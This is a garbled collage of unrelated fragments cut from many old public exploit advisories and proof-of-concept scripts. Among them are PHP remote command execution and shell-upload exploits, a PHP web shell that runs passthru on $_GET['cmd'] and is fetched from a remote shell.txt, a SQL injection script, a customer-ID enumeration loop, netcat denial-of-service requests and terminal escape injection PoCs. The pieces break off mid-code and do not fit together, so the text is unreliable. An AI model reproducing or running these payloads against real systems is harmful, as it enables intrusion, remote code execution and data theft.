if (empty($_POST['phpinfo'] )) {
}else{
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
exit;
}
if (isset($_POST['url'])) {
}
/* Starts a remote command session */
function fp_shell($crl, $sh)
{
echo "\nStarting remote command session, type 'quit' or 'exit' to exit.\n";
echo "\nremote> ";
$line = trim(fgets(STDIN));
while (($line != 'exit') && ($line != 'quit')) {
Looking inside the application source code:
###### CUT HERE ######
<style type="text/css">
body {
background-color: #<?php echo( $user_colors[ 'bg_color' ] ); ?>;
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
###### CUT HERE ######
It's easy to see that the "user_colors[bg_color]" is not validated and it's used directly inside an echo function.
By sending a trivial HTTP request against PHP environments with register_globals ON, it is possible to exploit this unvalidated user input flaw.
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
# FCMS (Family Connections) <= 0.1.1 Remote Command Execution Exploit
# AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>
# DOWNLOAD:http://sourceforge.net/project/showfiles.php?group_id=189733
# Thanks to rgod for the php code and Ajann for helps
";
The case is that of code equivalent to the following (for example, an online file editor script).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.txt'
ciccio.txt
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.php'
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
> No, but you can upgrade file from read-only to read-write using /proc.
Hmm.
$ cd test
$ echo moo >cow
$ exec 3<cow
$ ll /proc/self/fd
total 0
0 dr-x------ 2 ap users 0 2009-10-29 09:00 .
0 dr-xr-xr-x 7 ap users 0 2009-10-29 09:00 ..
File 'template/ja_purity/index.php' reads data with getParam and writes it directly:
57 <?php if ($tmpTools->getParam('theme_header') && $tmpTools->getParam('theme_header')!='-1') : ?>
58 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl(); ?>/styles/header/<?php echo $tmpTools->getParam('theme_header'); ?>/style.css" type="text/css" />
59 <?php endif; ?>
60 <?php if ($tmpTools->getParam('theme_background') && $tmpTools->getParam('theme_background')!='-1') : ?>
version:
---cut here---
<?php
if(sizeof($argv)!=4) {
echo "Usage: php5 $argv[0] <router ip addres> <port> <admin password>\n";
exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
Home : v4-team.com
note : this exploit for education :)
*/
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
$url = "http://127.0.0.1/index.php?page=cart&action=show";
$max = 1000;
for($customerid = 1; $customerid <= $max; $customerid++)
{
echo "<h3>Customerid: " . $customerid . "</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
rem raidenhttpdudo.cmd
@echo off
color 0a
rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit
rem WebAdmin one - not enabled by default anymore
rem however works regardless of php.ini, because
rem "ulang" comes from $_GET[] and some magic_quo
#
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/
if [ -z "$1" ]; then
echo "Usage: $0 <target-url>"
echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"
echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
Line 225 of file components/com_content/views/article/tmpl/form.php is vulnerable.
221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo $this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo $this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo $this->article->created_by; ?>" />
[=] Technical details :
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
Two "Connection:" headers : (echo "GET / HTTP/1.0"; echo "Connection: foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo "Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);
echo'<html>
<head>
<title>PHP CGI Argument Injection Remote Exploit</title>
</head>
<p align="center"><font size="4" color="#5E767E">PHP CGI Argument Injection</font></p>
/* MyCMS Command Execution
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* MyCmS Command Execution */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<4) {
One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
B) "Varnish" log escape sequence injection
One of the following two Proofs Of Concept can be used in order to
-rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value error_log /etc/
127# cat not.php
<?php
echo "only echo\n";
?>
127# cat pufff.php
<?php
echo "safe_mode=".ini_get("safe_mode")."\n";
echo "error_log=".ini_get("error_log")."\n";
-- cut --
#!/bin/sh
if [ -z "$1" ] || [ -z "$2" ]; then
echo "$0 addr file"
exit
fi
echo "--+ Arbitrary File Download PoC for Sourcefire 3D Defense Center < 4.10.2.3 +--"
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor="#00000">
On line 353 in googleanalytics.php the following vulnerable code was identified:
/**
* If this is a 404 page, track the 404 and prevent all other stuff as it's not needed.
*/
if ( is_404() ) {
echo "\t\t".'pageTracker._trackPageview("/404.html?page=" + document.location.pathname + document.location.search + "&from=" + document.referrer);'."\n";
echo "\t".'} catch(err) {}'."\n";
echo '</script>'."\n";
} else if ($wp_query->is_search && $wp_query->found_posts == 0) {
echo "\t\t".'pageTracker._trackPageview("'.get_bloginfo('url').'/?s=no-results: '.$wp_query->query_vars['s'].'&cat=no-results");'."\n";
echo "\t".'} catch(err) {}'."\n";
#PS: M7at7et w mrayech .. Man get a fucking life !!
#
IP=$1
echo -e "\n Sagem Router F@ST 2404 Remote Denial Of Service Exploit "
echo -e "\n By Underz0ne Crew "
if [ "$IP" = "" ];then
echo -e "\n USAGE : $0 [IP]\n"
echo -e "\n Example: $0 192.168.1.1\n "
/* ELSE IF CMS Multiple vulnerabilities
/* This exploit should allow you to Upload Shell ..
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* ELSEIF CMS Shell Upload Exploit */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<4) {
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"iLker Kandemir www.mefistolabs.com";ini_set("max_execution_time",0);echo "mefistolabs";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...<br />";
echo "coding by Super-Crystal <br />";
echo "Cleaning up<br />";
echo "Done!<br />
</pre>";
} else {
$in = fopen("php://stdin", 'r');
$text = fgets($in, 1024);
$text = trim($text);
return $text; }
echo "Gelato SQL Injection exploit -- by s0cratex\n";
echo "-------------------------------------------\n\n";
echo "Host (site.com): ";
$host = get_text();
> Options:
> -p[port]: specify a port other than 80
> -P[ip:port]: specify a proxy
> Example:
> php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
> shell.txt: <?php ob_clean();echo"iLker Kandemir www.mefistolabs.com";ini_set("max_execution_time",0);echo "mefistolabs";passthru($_GET["cmd"]);die;?>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> ');
> die;
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++
This is a simple PoC for easy demonstration:
#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od -tx1 | cut -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n $b; echo -n "++";
including your statement below is all based on false assumptions...
I'll show you a snip out of my strace of the original scenario, being performed by Pavel. But the same mechanism is being performed by you, Jim, in the following step:
# su nobody -c 'echo "hacked" >/proc/self/fd/0' < /dir/file.txt
All you do is just open the FILE via the path of /proc, not via the assumed path via /tmp (or /dir in your example) nor access the assumed read-only fd being